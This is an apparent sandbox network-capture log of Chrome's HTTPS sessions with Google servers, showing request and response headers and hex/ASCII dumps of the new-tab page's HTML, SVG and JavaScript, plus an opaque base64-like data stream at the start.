                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC746INData Raw: 58 45 76 4f 56 52 4c 5a 45 70 77 62 57 51 30 4e 57 38 77 61 6b 74 4e 63 32 64 59 56 55 78 78 55 55 35 70 64 44 6b 76 54 45 46 56 62 6c 6b 72 62 31 51 33 53 46 5a 46 5a 56 6b 31 56 55 31 32 62 55 31 72 56 46 55 34 64 58 42 61 53 56 70 71 52 33 70 6b 4d 6e 6b 7a 64 47 4a 5a 56 30 6c 33 56 6d 78 47 54 57 70 77 57 46 52 54 4d 57 5a 47 63 46 52 49 63 45 52 54 54 32 38 78 61 6d 35 7a 59 6c 67 35 59 30 78 48 55 33 6c 34 63 45 39 5a 63 56 52 32 55 45 6c 6f 57 55 68 76 5a 45 70 30 63 46 42 79 59 7a 52 72 63 6e 46 6e 4e 6b 4e 5a 63 55 56 56 5a 7a 4a 43 51 6d 5a 57 63 6d 4a 33 4f 47 64 50 5a 55 4a 4c 54 33 63 30 55 46 5a 44 64 6d 35 47 56 58 52 53 56 56 4e 74 54 6c 52 48 63 56 63 33 63 53 39 6b 51 58 52 5a 52 44 42 34 62 32 35 33 4e 58 46 61 53 30 52 4a 4e 6d 46 47
                                                                                                                                                                                                                                                                                      Data Ascii: XEvOVRLZEpwbWQ0NW8waktNc2dYVUxxUU5pdDkvTEFVblkrb1Q3SFZFZVk1VU12bU1rVFU4dXBaSVpqR3pkMnkzdGJZV0l3VmxGTWpwWFRTMWZGcFRIcERTT28xam5zYlg5Y0xHU3l4cE9ZcVR2UEloWUhvZEp0cFByYzRrcnFnNkNZcUVVZzJCQmZWcmJ3OGdPZUJLT3c0UFZDdm5GVXRSVVNtTlRHcVc3cS9kQXRZRDB4b253NXFaS0RJNmFG
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC89INData Raw: 35 33 0d 0a 7a 67 72 56 6a 68 4b 54 31 68 4f 57 58 6c 6d 56 44 6c 6a 56 44 46 55 61 6c 6c 44 64 33 56 44 59 31 5a 78 4d 31 70 35 56 57 35 57 52 6b 74 54 55 6d 64 59 51 33 4e 4d 54 57 49 7a 52 30 64 6d 4e 47 55 76 53 6e 6b 31 63 6b 35 52 57 6d 70 4b 52 55 6c 4c 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 53zgrVjhKT1hOWXlmVDljVDFUallDd3VDY1ZxM1p5VW5WRktTUmdYQ3NMTWIzR0dmNGUvSnk1ck5RWmpKRUlL
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1390INData Raw: 66 63 66 0d 0a 65 55 78 54 63 58 6b 33 51 6e 42 42 55 6c 6c 42 4b 30 35 70 59 30 73 78 65 48 4a 56 62 6e 41 30 4e 48 5a 32 52 58 4e 30 54 58 4a 50 51 33 5a 74 51 6d 55 76 64 47 68 57 59 55 35 6b 54 57 4a 6d 61 55 78 73 56 6b 35 72 61 47 39 68 54 32 64 52 59 58 46 73 65 54 46 31 62 30 46 7a 54 47 5a 56 61 7a 52 54 62 7a 46 61 56 32 74 71 61 33 56 49 57 47 4e 69 4f 47 70 6e 61 6d 30 79 59 54 46 74 5a 46 55 35 54 45 52 59 55 33 4a 50 4d 55 68 48 65 58 68 35 61 30 56 54 54 55 4e 53 4f 54 52 75 62 6d 45 7a 54 7a 45 35 4f 54 63 30 52 58 70 34 64 6b 4d 30 54 69 74 6c 4d 33 52 70 53 6b 35 4d 53 6d 30 33 57 6d 46 70 63 57 46 35 61 6c 70 36 56 46 52 51 53 48 68 5a 65 58 4a 72 52 48 41 72 62 6e 4a 36 65 46 5a 58 54 57 74 72 55 6d 70 6d 52 57 6c 72 59 6d 46 55 4d 30
                                                                                                                                                                                                                                                                                      Data Ascii: fcfeUxTcXk3QnBBUllBK05pY0sxeHJVbnA0NHZ2RXN0TXJPQ3ZtQmUvdGhWYU5kTWJmaUxsVk5raG9hT2dRYXFseTF1b0FzTGZVazRTbzFaV2tqa3VIWGNiOGpnam0yYTFtZFU5TERYU3JPMUhHeXh5a0VTTUNSOTRubmEzTzE5OTc0RXp4dkM0TitlM3RpSk5MSm03WmFpcWF5alp6VFRQSHhZeXJrRHArbnJ6eFZXTWtrUmpmRWlrYmFUM0
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1390INData Raw: 39 56 4d 30 78 76 4e 69 39 56 61 31 70 35 65 6d 77 32 61 53 74 30 59 30 39 6b 62 45 74 75 57 54 42 6b 62 58 68 78 54 47 35 61 64 58 4e 4d 51 30 46 42 57 47 56 7a 63 6e 42 4b 59 6a 56 56 51 55 52 48 51 58 42 53 64 7a 68 4b 51 55 46 42 52 57 4e 72 62 45 56 52 56 6c 4a 4a 61 57 56 58 56 7a 4a 59 59 6d 6c 50 51 6b 4e 48 64 6d 4e 31 55 30 46 4e 63 32 4a 42 62 32 56 6b 52 55 31 42 57 55 55 33 59 57 31 50 64 7a 4e 4f 57 6b 52 4c 56 44 56 51 4d 6d 5a 68 52 58 45 79 53 56 46 5a 54 58 6c 61 62 53 74 74 57 46 42 74 64 6e 70 43 55 56 5a 49 4d 6e 56 4c 63 32 78 73 55 32 52 4b 54 6d 31 5a 59 57 4e 78 52 6d 45 31 4e 31 70 6a 56 45 34 30 4b 30 73 30 4e 55 6c 78 57 69 39 4b 62 6c 70 72 4e 31 51 32 4c 30 5a 30 55 69 38 79 55 57 39 6a 64 45 68 73 57 45 6f 79 64 46 68 56 4d
                                                                                                                                                                                                                                                                                      Data Ascii: 9VM0xvNi9Va1p5emw2aSt0Y09kbEtuWTBkbXhxTG5adXNMQ0FBWGVzcnBKYjVVQURHQXBSdzhKQUFBRWNrbEVRVlJJaWVXVzJYYmlPQkNHdmN1U0FNc2JBb2VkRU1BWUU3YW1PdzNOWkRLVDVQMmZhRXEySVFZTXlabSttWFBtdnpCUVZIMnVLc2xsU2RKTm1ZYWNxRmE1N1pjVE40K0s0NUlxWi9KblprN1Q2L0Z0Ui8yUW9jdEhsWEoydFhVM
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1274INData Raw: 59 54 4e 43 53 47 4e 6f 55 6a 42 7a 57 57 70 31 61 55 64 54 53 55 31 6c 61 31 56 51 5a 30 52 7a 51 6a 4a 4d 56 54 4a 42 53 55 46 6c 62 30 70 56 63 57 6c 35 5a 6d 6c 31 4c 79 73 77 57 6b 39 6e 56 6e 70 4f 51 55 55 79 54 7a 42 53 52 57 6c 7a 65 47 67 7a 65 55 56 6f 63 55 78 61 59 56 4d 30 53 6d 64 4d 51 6d 39 47 65 6b 56 58 4e 33 56 43 55 6c 5a 33 57 6b 35 43 5a 7a 6b 34 64 55 4a 73 61 55 70 55 53 45 52 6e 64 6d 5a 74 52 54 42 52 53 47 70 56 56 33 5a 35 4e 33 42 4b 62 45 4e 4a 4f 46 56 72 51 55 52 45 56 56 64 45 52 31 4e 33 56 6c 68 49 51 31 68 70 55 6a 42 68 55 56 4e 34 61 57 4e 43 5a 58 64 53 51 6c 46 31 61 55 35 59 54 46 68 5a 57 58 42 68 4e 33 64 74 56 56 64 48 4f 55 56 58 57 48 52 57 55 44 5a 6c 55 7a 6c 4a 53 57 52 32 57 48 6c 47 55 30 31 35 52 44 42
                                                                                                                                                                                                                                                                                      Data Ascii: YTNCSGNoUjBzWWp1aUdTSU1la1VQZ0RzQjJMVTJBSUFlb0pVcWl5Zml1LyswWk9nVnpOQUUyTzBSRWlzeGgzeUVocUxaYVM0SmdMQm9GekVXN3VCUlZ3Wk5CZzk4dUJsaUpUSERndmZtRTBRSGpVV3Z5N3BKbENJOFVrQUREVVdER1N3VlhIQ1hpUjBhUVN4aWNCZXdSQlF1aU5YTFhZWXBhN3dtVVdHOUVXWHRWUDZlUzlJSWR2WHlGU015RDB
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      9192.168.2.749789172.217.21.364437992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:11 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      10192.168.2.749790172.217.21.364437992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:11 UTC498OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Version: 705503573
                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:12 GMT
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC372INData Raw: 31 37 36 31 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                      Data Ascii: 1761)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                      Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                      Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                      Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                      Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC61INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC263INData Raw: 31 30 30 0d 0a 37 30 30 33 30 33 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69
                                                                                                                                                                                                                                                                                      Data Ascii: 100700303,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)i
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1390INData Raw: 38 30 30 30 0d 0a 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c
                                                                                                                                                                                                                                                                                      Data Ascii: 8000stanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.l
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1390INData Raw: 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 46 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4c 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53
                                                                                                                                                                                                                                                                                      Data Ascii: d(\"about:invalid#zClosurez\");_.Fd\u003dclass{constructor(a){this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Ld\u003dclass{constructor(a){this.i\u003da}toS
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1390INData Raw: 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33
                                                                                                                                                                                                                                                                                      Data Ascii: \u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"array\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      11192.168.2.749794172.217.21.364437992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Version: 705503573
                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
